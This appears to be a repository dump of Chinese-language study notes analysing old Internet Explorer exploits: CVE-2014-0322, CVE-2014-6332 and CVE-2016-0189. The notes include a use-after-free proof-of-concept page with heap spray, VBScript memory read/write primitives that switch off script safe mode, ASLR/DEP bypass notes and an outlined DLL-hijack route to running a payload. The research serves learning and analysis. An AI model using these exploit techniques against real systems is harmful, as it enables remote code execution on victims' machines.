├── .gitignore
├── BrowserSecurity
    ├── CVE-2014-0322.md
    ├── CVE-2014-0322
    │   ├── CVE-2014-03220.png
    │   ├── CVE-2014-03221.png
    │   ├── CVE-2014-032210.png
    │   ├── CVE-2014-032211.png
    │   ├── CVE-2014-032212.png
    │   ├── CVE-2014-032213.png
    │   ├── CVE-2014-032214.png
    │   ├── CVE-2014-032215.png
    │   ├── CVE-2014-032216.png
    │   ├── CVE-2014-03222.png
    │   ├── CVE-2014-03223.png
    │   ├── CVE-2014-03224.png
    │   ├── CVE-2014-03225.png
    │   ├── CVE-2014-03226.png
    │   ├── CVE-2014-03227.png
    │   ├── CVE-2014-03228.png
    │   └── CVE-2014-03229.png
    ├── CVE-2014-6332.md
    ├── CVE-2014-6332
    │   ├── CVE-2014-63320.png
    │   ├── CVE-2014-63321.png
    │   ├── CVE-2014-63322.png
    │   ├── CVE-2014-63323.png
    │   ├── CVE-2014-63324.png
    │   ├── CVE-2014-63325.png
    │   └── CVE-2014-63326.png
    ├── CVE-2016-0189.md
    ├── CVE-2016-0189
    │   ├── CVE-2016-01890.png
    │   ├── CVE-2016-01891.png
    │   ├── CVE-2016-018910.png
    │   ├── CVE-2016-018911.png
    │   ├── CVE-2016-018912.png
    │   ├── CVE-2016-018913.png
    │   ├── CVE-2016-018914.png
    │   ├── CVE-2016-01892.png
    │   ├── CVE-2016-01893.png
    │   ├── CVE-2016-01894.png
    │   ├── CVE-2016-01895.png
    │   ├── CVE-2016-01896.png
    │   ├── CVE-2016-01897.png
    │   ├── CVE-2016-01898.png
    │   └── CVE-2016-01899.png
    ├── CVE-2016-5197.md
    ├── CVE-2016-5197
    │   ├── CVE-2016-51970.png
    │   ├── CVE-2016-51971.png
    │   ├── CVE-2016-519710.png
    │   ├── CVE-2016-51972.png
    │   ├── CVE-2016-51973.png
    │   ├── CVE-2016-51974.png
    │   ├── CVE-2016-51975.png
    │   ├── CVE-2016-51976.png
    │   ├── CVE-2016-51977.png
    │   ├── CVE-2016-51978.png
    │   └── CVE-2016-51979.png
    ├── CVE-2017-5070.md
    ├── CVE-2017-5070
    │   ├── CVE-2017-50700.png
    │   ├── CVE-2017-50701.png
    │   ├── CVE-2017-50702.png
    │   ├── CVE-2017-50703.png
    │   └── CVE-2017-50704.png
    ├── CVE-2018-8174.md
    ├── CVE-2018-8174
    │   ├── CVE-2018-81740.png
    │   ├── CVE-2018-81741.png
    │   ├── CVE-2018-817410.png
    │   ├── CVE-2018-817411.png
    │   ├── CVE-2018-817412.png
    │   ├── CVE-2018-817413.png
    │   ├── CVE-2018-817414.png
    │   ├── CVE-2018-817415.png
    │   ├── CVE-2018-817416.png
    │   ├── CVE-2018-817417.png
    │   ├── CVE-2018-817418.png
    │   ├── CVE-2018-817419.png
    │   ├── CVE-2018-81742.png
    │   ├── CVE-2018-817420.png
    │   ├── CVE-2018-817421.png
    │   ├── CVE-2018-817422.png
    │   ├── CVE-2018-817423.png
    │   ├── CVE-2018-817424.png
    │   ├── CVE-2018-817425.png
    │   ├── CVE-2018-817426.png
    │   ├── CVE-2018-817427.png
    │   ├── CVE-2018-817428.png
    │   ├── CVE-2018-817429.png
    │   ├── CVE-2018-81743.png
    │   ├── CVE-2018-81744.png
    │   ├── CVE-2018-81745.png
    │   ├── CVE-2018-81746.png
    │   ├── CVE-2018-81747.png
    │   ├── CVE-2018-81748.png
    │   ├── CVE-2018-81749.png
    │   ├── [VulnerabilityExploit]BypassALSR0.png
    │   ├── [VulnerabilityExploit]BypassALSR1.png
    │   ├── [VulnerabilityExploit]BypassALSR10.png
    │   ├── [VulnerabilityExploit]BypassALSR11.png
    │   ├── [VulnerabilityExploit]BypassALSR12.png
    │   ├── [VulnerabilityExploit]BypassALSR2.png
    │   ├── [VulnerabilityExploit]BypassALSR3.png
    │   ├── [VulnerabilityExploit]BypassALSR4.png
    │   ├── [VulnerabilityExploit]BypassALSR5.png
    │   ├── [VulnerabilityExploit]BypassALSR6.png
    │   ├── [VulnerabilityExploit]BypassALSR7.png
    │   ├── [VulnerabilityExploit]BypassALSR9.png
    │   ├── [VulnerabilityExploit]BypassDEP0.png
    │   ├── [VulnerabilityExploit]BypassDEP1.png
    │   ├── [VulnerabilityExploit]BypassDEP2.png
    │   ├── [VulnerabilityExploit]BypassDEP3.png
    │   ├── [VulnerabilityExploit]BypassDEP4.png
    │   ├── [VulnerabilityExploit]BypassDEP5.png
    │   ├── [VulnerabilityExploit]BypassDEP6.png
    │   ├── [VulnerabilityExploit]BypassDEP7.png
    │   ├── [VulnerabilityExploit]BypassDEP8.png
    │   └── [VulnerabilityExploit]BypassDEP9.png
    ├── README.md
    ├── README
    │   ├── Basics0.png
    │   ├── Basics1.png
    │   ├── Basics2.png
    │   ├── Basics3.png
    │   ├── Basics4.png
    │   ├── Basics5.png
    │   ├── Basics6.png
    │   ├── InternetExplorer0.png
    │   ├── InternetExplorer1.png
    │   ├── InternetExplorer2.png
    │   ├── InternetExplorer4.png
    │   ├── V80.png
    │   ├── V81.png
    │   ├── V810.png
    │   ├── V811.png
    │   ├── V812.png
    │   ├── V813.png
    │   ├── V814.png
    │   ├── V815.png
    │   ├── V816.png
    │   ├── V817.png
    │   ├── V818.png
    │   ├── V819.png
    │   ├── V82.png
    │   ├── V820.png
    │   ├── V821.png
    │   ├── V822.png
    │   ├── V823.png
    │   ├── V824.png
    │   ├── V825.png
    │   ├── V826.png
    │   ├── V827.png
    │   ├── V828.png
    │   ├── V829.png
    │   ├── V83.png
    │   ├── V84.png
    │   ├── V85.png
    │   ├── V86.png
    │   ├── V87.png
    │   ├── V88.png
    │   ├── V89.png
    │   ├── VbscriptBasics0.png
    │   ├── VbscriptBasics2.png
    │   ├── VbscriptBasics3.png
    │   └── VbscriptBasics4.png
    └── V8.md
├── README.md
└── WindowsExploitDevelopment
    ├── Part0-HackNotes.md
    ├── Part1-StackOverflow.md
    ├── Part1-StackOverflow
        ├── Part1-StackOverflow0.png
        ├── Part1-StackOverflow1.png
        ├── Part1-StackOverflow2.png
        ├── Part1-StackOverflow3.png
        ├── Part1-StackOverflow4.png
        ├── Part1-StackOverflow5.png
        ├── Part1-StackOverflow6.png
        ├── Part1-StackOverflow7.png
        ├── Part1-StackOverflow8.png
        └── Part1-StackOverflow9.png
    ├── Part2-SEHExploit.md
    ├── Part2-SEHExploit
        ├── Part2-SEHExploit0.png
        ├── Part2-SEHExploit1.png
        ├── Part2-SEHExploit2.png
        ├── Part2-SEHExploit3.png
        ├── Part2-SEHExploit5.png
        ├── Part2-SEHExploit6.png
        └── Part2-SEHExploit7.png
    ├── Part3-BypassDEPwithROP.md
    ├── Part3-BypassDEPwithROP
        ├── Part3-BypassDEPwithROP0.png
        ├── Part3-BypassDEPwithROP1.png
        ├── Part3-BypassDEPwithROP2.png
        ├── Part3-BypassDEPwithROP3.png
        ├── Part3-BypassDEPwithROP4.png
        ├── Part3-ROP0.png
        ├── Part3-ROP1.png
        ├── Part3-ROP2.png
        └── Part3-ROP3.png
    ├── Part4-From0x00410041toCalc.md
    └── Part4-From0x00410041toCalc
        ├── Part4-From0x00410041toCalc0.png
        ├── Part4-From0x00410041toCalc1.png
        ├── Part4-From0x00410041toCalc2.png
        ├── Part4-From0x00410041toCalc3.png
        ├── Part4-From0x00410041toCalc4.png
        ├── Part4-From0x00410041toCalc5.png
        └── Part4-From0x00410041toCalc6.png


/.gitignore:
--------------------------------------------------------------------------------
1 | *Samples*
2 | *CVE-2018-8373*


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322.md:
--------------------------------------------------------------------------------
  1 | # CVE-2014-0322 分析
  2 | 
  3 | 算是第一个克服畏难情绪、没有依赖他人分析文章的sample；慢慢自己会去下一些断点，总结一些内存结构，一个有纪念意义的sample。
  4 | 
  5 | 
  6 | ## UAF分析
  7 | Win7+IE10+flashplayer12_0r0_70_winax
  8 | 
  9 | 并非稳定exploit，HeapSpray并不一定能喷射成期望的布局
 10 | 
 11 | ```
 12 | <!-- crash POC -->
 13 | <html>
 14 | <head>
 15 | </head>
 16 | <body>
 17 | 
 18 |     <script>
 19 |         function debug_stop(text){
 20 |             Math.atan2(0xbadc0de, text);
 21 |         }
 22 |         
 23 |         function debug_continue(text){
 24 |             Math.atan(text);
 25 |         }
 26 |         
 27 |     
 28 |         var g_arr = [];
 29 |         var arrLen = 0x250;
 30 |         function dword2data(dword)
 31 |         {
 32 |             var d = Number(dword).toString(16);
 33 |             while (d.length < 8)
 34 |                 d = '0' + d;
 35 |             return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
 36 |         }
 37 |         
 38 |         function eXpl()
 39 |         {
 40 |             debug_stop("enter eXpl");
 41 |             var a = 0;
 42 |             for (a = 0; a < arrLen; a++) {
 43 |                 g_arr[a] = document.createElement('div');
 44 |             }
 45 |             // Build a new object
 46 |             var b = dword2data(0x19fffff3);
 47 |             while (b.length < 0x360)
 48 |             {
 49 |                 // mov     eax,dword ptr [esi+98h]
 50 |                 // ...
 51 |                 // mov     eax,dword ptr [eax+8]
 52 |                 // and     dword ptr [eax+2F0h],0FFFFFFBFh
 53 |                 if (b.length == (0x98 / 2))
 54 |                 {
 55 |                     b += dword2data(0x1a000010);
 56 |                 }
 57 |                 // mov     ecx,dword ptr [edx+94h]
 58 |                 // mov     eax,dword ptr [ecx+0Ch]
 59 |                 else if (b.length == (0x94 / 2))
 60 |                 {
 61 |                     b += dword2data(0x1a111111);
 62 |                 }
 63 |                 // mov     eax,dword ptr [edx+15Ch]
 64 |                 // mov     ecx,dword ptr [eax+edx*8]
 65 |                 else if (b.length == (0x15c / 2))
 66 |                 {
 67 |                     b += dword2data(0x42424242);
 68 |                 } else
 69 |                 {
 70 |                     b += dword2data(0x19fffff3);
 71 |                 }
 72 |             }
 73 |             var d = b.substring(0, (0x340 - 2) / 2);
 74 |             // trigger
 75 |             
 76 |             debug_stop("before trigger bug, enable CMarkup breakpoint");
 77 |             try {
 78 |                 this.outerHTML = this.outerHTML
 79 |             
 80 |                 } catch (e) {
 81 |             }
 82 |             
 83 |             debug_stop("before CollectGarbage");
 84 |             CollectGarbage();
 85 |                 
 86 |             // Replace freed object
 87 |             
 88 |             for (a = 0; a < arrLen; a++)
 89 |             {
 90 |                 g_arr[a].title = d.substring(0, d.length);
 91 |             }
 92 |             
 93 |             debug_stop("finish replace object")
 94 |         }
 95 |         // Trigger the vulnerability
 96 |         function trigger()
 97 |         {
 98 |             var a = document.getElementsByTagName("script");
 99 |             var b = a[0];
100 |             b.onpropertychange = eXpl;
101 |             var c = document.createElement('SELECT');
102 |             debug_stop("Before Append Child");
103 |             c = b.appendChild(c);
104 |         }
105 |         
106 |         trigger()
107 |     </script>
108 |     
109 |     <!-- <embed src=AsXploit.swf width="10" height="10"></embed> -->
110 |     
111 | </body>
112 | </html>
113 | 
114 | 
115 | 调试事项：
116 | 1. enable hpa
117 | 2. 断点
118 | bu MSHTML!CScriptElement::CreateElement "gu; gu; .printf \"CScriptElement Address: %p\\n\",poi(ebp-4); "
119 | bu jscript9!Js::Math::Atan ".printf \"DEBUG: %mu\\n\", poi(poi(esp+10)+c);g"
120 | bu jscript9!Js::Math::Atan2 ".printf \"DEBUG: %mu\\n\", poi(poi(esp+14)+c);"
121 | bu MSHTML!CMarkup::~CMarkup ".printf \"Release CMarkup Object: %p\\n\",ecx; gu;"
122 | bu MSHTML!CMarkup::CMarkup "gu; .printf \"New CMarkup Object: %p\\n\",eax ;"
123 | ```
124 | 
125 | ```
126 | b.onpropertychange = eXpl
127 | 这行代码会触发eXpl的执行
128 | ```
129 | 
130 | ```
131 | 执行this.outerHTML = this.outerHTML时，会创建一个新的script节点，用它替换原有Script节点
132 | ```
133 | 
134 | ![](CVE-2014-0322/CVE-2014-03222.png)
135 | 
136 | 
137 | ![](CVE-2014-0322/CVE-2014-03220.png)
138 | 
139 | ```
140 | c = b.appendChild(c), 因为b已经不在主Dom流中了，为了对它appendChild需要创建一条新的Dom流; 
141 | 而对b appendChild, 会触发eXpl执行（b的属性被改变啊）
142 | ```
143 | 
144 | ![](CVE-2014-0322/CVE-2014-03221.png)
145 | 
146 | ```
147 | 再次执行
148 | this.outerHTML = this.outerHTML， 不知为何这里多了CMarkup_a的释放，更不知为何后面又重新引用它，从而就UAF啦
149 | ```
150 | 
151 | ![](CVE-2014-0322/CVE-2014-03223.png)
152 | 
153 | 
154 | ![](CVE-2014-0322/CVE-2014-03224.png)
155 | 
156 | ```
157 | 通过在call释放CMarkup_a前下断点，发现了CMarkup_a被释放的原因
158 | MSHTML!InjectHtmlStream 有一段这样的Code, 先释放临时CMarkup对象，再释放script_a 所在CMarkup 对象
159 | 
160 | ```
161 | 
162 | ![](CVE-2014-0322/CVE-2014-03225.png)
163 | 
164 | ```
165 | CMarkup::~CMarkup 并不是每次都释放CMarkup，
166 | 如果对象还被引用，则~CMarkup只是减少引用计数；
167 | 如果引用计数为0，才会真正释放CMarkup 对象
168 | ```
169 | 
170 | ![](CVE-2014-0322/CVE-2014-03226.png)
171 | 
172 | ```
173 | 当eXpl执行完回到appendChild的逻辑时，继续用到了CMarkup_a, 因为它是对script_a appendChild
174 | 综上： 本质上还是CMarkup对象的引用计数更新不对，导致错误释放
175 | 
176 | ```
177 | 
178 | ## 数组越界访问
179 | ```
180 | CMarkup Object被19fffff3填充，而后续会有inc [eax+10]，从而修改了1a000000 处vector的length
181 | ```
182 | ![](CVE-2014-0322/CVE-2014-03227.png)
183 | 
184 | ```
185 | 把下一个vector的length改为0x3FFFFFFF，可读写范围更大了
186 | ```
187 | ![](CVE-2014-0322/CVE-2014-03228.png)
188 | 
189 | 
190 | ## Bypass ALSR
191 | ```
192 | Bypass ALSR与其他exploit类似，之前分析过，略
193 | ```
194 | ![](CVE-2014-0322/CVE-2014-03229.png)
195 | 
196 | ## Bypass DEP
197 | ```
198 | 在flash .text字段搜寻0xC394用于stack pivot
199 | //  94              xchg    eax,esp
200 | //  c3              ret        
201 | 
202 | 这里又可以继续了解PE结构啦~~~
203 | ```
204 | 
205 | ![](CVE-2014-0322/CVE-2014-032211.png)
206 | 
207 | ![](CVE-2014-0322/CVE-2014-032210.png)
208 | 
209 | ![](CVE-2014-0322/CVE-2014-032212.png)
210 | 
211 | 
212 | ## Run Shellcode
213 | 
214 | ![](CVE-2014-0322/CVE-2014-032213.png)
215 | 
216 | ******************************************************
217 | 
218 | ![](CVE-2014-0322/CVE-2014-032214.png)
219 | 
220 | ******************************************************
221 | 
222 | ![](CVE-2014-0322/CVE-2014-032215.png)
223 | 
224 | ******************************************************
225 | 
226 | ![](CVE-2014-0322/CVE-2014-032216.png)


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03220.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03220.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03221.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03221.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032210.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032210.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032211.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032211.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032212.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032212.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032213.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032213.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032214.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032214.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032215.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032215.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-032216.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-032216.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03222.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03222.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03223.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03223.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03224.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03224.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03225.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03225.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03226.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03226.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03227.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03227.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03228.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03228.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-0322/CVE-2014-03229.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-0322/CVE-2014-03229.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332.md:
--------------------------------------------------------------------------------
  1 | # CVE-2014-6332分析
  2 | 
  3 | **Win7x86+IE11**
  4 | 
  5 | ![](CVE-2014-6332/CVE-2014-63326.png)
  6 | 
  7 | 1. root cause
  8 | 
  9 | 注意到aa的length变为0x8000005
 10 | 
 11 | ```
 12 | dim aa()
 13 | redim aa(5)
 14 | aa(0) = &h11223344
 15 | 
 16 | a2=5+&h8000000
 17 | IsEmpty(aa)
 18 | 
 19 | redim Preserve aa(a2)
 20 | IsEmpty(aa)
 21 | 
 22 | ```
 23 | 
 24 | 对length 被修改的内存下硬件写断点，定位到OLEAUT32!SafeArrayRedim
 25 | 
 26 | OLEAUT32!SafeArrayRedim 逻辑如下
 27 | ![](CVE-2014-6332/CVE-2014-63320.png)
 28 | 
 29 | 2. 构造交错aa, ab
 30 | 
 31 | 由于OLEAUT32!SafeArrayRedim 中的bug，redim Preserve aa(a2) 之后会使得aa可以越界访问。通过循环申请aa和ab，试图构造出以下内存布局
 32 | 
 33 | ![](CVE-2014-6332/CVE-2014-63321.png)
 34 | 
 35 | 3. Setnotsafemode
 36 | 
 37 | ```
 38 | function Mydata()  
 39 |   On Error Resume Next
 40 |   i=testaa
 41 |   i=null
 42 |   IsEmpty(i)
 43 | 
 44 |   redim Preserve aa(a2)
 45 |   ab(0)=0
 46 |   aa(a1)=i
 47 |   ab(0)=6.36598737437801E-314  
 48 |   aa(a1+2)=myarray
 49 |   ab(2)=1.74088534731324E-310  
 50 |   IsEmpty("Before return Mydata")
 51 |   Mydata=aa(a1)
 52 |   redim Preserve aa(a0)
 53 | end function
 54 | ```
 55 | 
 56 | ![](CVE-2014-6332/CVE-2014-63322.png)
 57 | ![](CVE-2014-6332/CVE-2014-63323.png)
 58 | 
 59 | ``` 
 60 | 通过对aa, ab交替赋值，即可修改myarray、CScriptEntryPoint的type
 61 | 从而得到一个 [0x0, 0x7fff0000) 的array, 以及CScriptEntryPoint 对象地址
 62 | 
 63 | ```
 64 | 
 65 | ![](CVE-2014-6332/CVE-2014-63324.png)
 66 | 
 67 | 
 68 | ```
 69 | function ReadMemo(add)  
 70 |   On Error Resume Next
 71 |   redim Preserve aa(a2)
 72 |   ab(0)=0
 73 |   aa(a1)=add+4
 74 |   ab(0)=1.69759663316747E-313
 75 |   IsEmpty("Before Return ReadMemo")
 76 |   ReadMemo=lenb(aa(a1))  
 77 |   ab(0)=0
 78 |   redim Preserve aa(a0)
 79 | end function
 80 | ```
 81 | 
 82 | ![](CVE-2014-6332/CVE-2014-63325.png)
 83 | 
 84 | ```
 85 |   i=Mydata()    'i为vbscript!CScriptEntryPoint 对象地址
 86 |   i=ReadMemo(i+8)
 87 |   i=ReadMemo(i+16)  'i为vbscript!COleScript 对象地址
 88 | 
 89 |   for k=0 to &h60 step 4  
 90 |     j=ReadMemo(i+&h120+k)
 91 |     if (j=&he) then      '找到[ecx+0x174]==0xe的位置
 92 |       redim Preserve aa(a2)
 93 |       aa(a1+2)(i+&h11c+k)=ab(4)   'ab(4)还保留着初始化时的0； aa(a1+2)是myarray; [ecx+0x174]被赋值为0
 94 |       redim Preserve aa(a0)
 95 |       exit for
 96 |     end if
 97 |   next
 98 | ```
 99 | 
100 | ```
101 | 修改[ecx+0x174]成功，进入GodMode，即可执行shellcode
102 | 0:007> dd 01d1e758+170 L2
103 | 01d1e8c8  00000000 0000000e
104 | 0:007> dd 01d1e758+170 L2
105 | 01d1e8c8  00000000 00000000
106 | ```
107 | 
108 | ** 为什么要构造一个myarray? **
109 | ```
110 | 尽管aa已经有全址读写能力，但它的base不是从0开始。当ecx+174h的值后，我们不方便通过aa定位到它。
111 | 
112 | 通过myarray，直接使用下标就可以访问它，更加方便。
113 | ```
114 | 


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63320.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63320.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63321.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63321.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63322.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63322.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63323.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63323.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63324.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63324.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63325.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63325.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2014-6332/CVE-2014-63326.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2014-6332/CVE-2014-63326.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189.md:
--------------------------------------------------------------------------------
 1 | # CVE-2016-0189分析
 2 | 
 3 | # About GodMode and EPM
 4 | 1. 当[ecx+0x174]&0xB时，即可开启GodMode;但GodMode只是控制unsafe extensions (such as “Shell.Application”)能否执行，并不能突破IE的sandbox, 即EPM
 5 | 
 6 | ![](CVE-2016-0189/CVE-2016-01890.png)
 7 | 
 8 | 2. vista之后默认是开启EPM的，因此pop up notepad没有问题，却无法pop up cmd;pop up calc 则需要用户允许，这都是由于ElevationPolicy控制的。 如果可以pop up calc/cmd, 可能是由于你是Administrator 用户登录，从而IE是high Integrity Level
 9 | 
10 | ![](CVE-2016-0189/CVE-2016-01892.png)
11 | 3. 既然不能突破sandbox，如何执行shellcode
12 | 
13 | - DLL劫持攻擊
14 |     ```
15 |     download一个fake shell32.dll和PE到temp目录
16 |     设置temp 目录为系统目录
17 |     new 一个shellShell.Application时，会调用fake shell32.dll，从而执行PE
18 |     ```
19 | 
20 | - local server(Further Reading1)
21 | 
22 | # 1. 泄漏VBScriptClass对象地址
23 | ![](CVE-2016-0189/CVE-2016-01897.png)
24 | 
25 | 调试过程如下：
26 | 最初aw.A的size
27 | 
28 | ![](CVE-2016-0189/CVE-2016-01893.png)
29 | 
30 | Resize()
31 | 
32 | ![](CVE-2016-0189/CVE-2016-01894.png)
33 | 
34 | 使用y_array32占位
35 | 
36 | ![](CVE-2016-0189/CVE-2016-01895.png)
37 | 
38 | Set aw.A(arg1, 2) = s，造成越界读写，与y_array32内容交错
39 | 
40 | ![](CVE-2016-0189/CVE-2016-01896.png)
41 | 
42 | 遍历y_array32, 即可得到VBScriptClass对象地址
43 | 
44 | 
45 | 这里有必要解释下为什么是IsEmpty(aw)，而不是IsEmpty(aw.A)
46 | 
47 | ![](CVE-2016-0189/CVE-2016-01891.png)
48 | 
49 | # 2. Leak ColeScript对象地址
50 | 
51 | ![](CVE-2016-0189/CVE-2016-01898.png)
52 | 
53 | ![](CVE-2016-0189/CVE-2016-01899.png)
54 | 
55 | # 3. 修改SafeMode标识
56 | 
57 | ![](CVE-2016-0189/CVE-2016-018910.png)
58 | 
59 | ![](CVE-2016-0189/CVE-2016-018911.png)
60 | 
61 | ![](CVE-2016-0189/CVE-2016-018912.png)
62 | 
63 | 4. 执行shell code
64 | 
65 | - 简单弹出notepad.exe
66 | 
67 | ![](CVE-2016-0189/CVE-2016-018913.png)
68 | 
69 | - 执行PE （不成功，暂时mark，想知道新启动进程的权限是low还是medium）
70 | 
71 | ![](CVE-2016-0189/CVE-2016-018914.png)
72 | 
73 | 
74 | ## Further Reading
75 | 1. https://theori.io/research/cve-2016-0189.
76 | 2. https://bbs.pediy.com/thread-228371.htm
77 | 3. https://www.freebuf.com/sectool/131766.html
78 | 4. https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf
79 | 


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01890.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01890.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-01891.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-01891.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-018910.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2016-0189/CVE-2016-018910.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2016-0189/CVE-2016-018911.png:
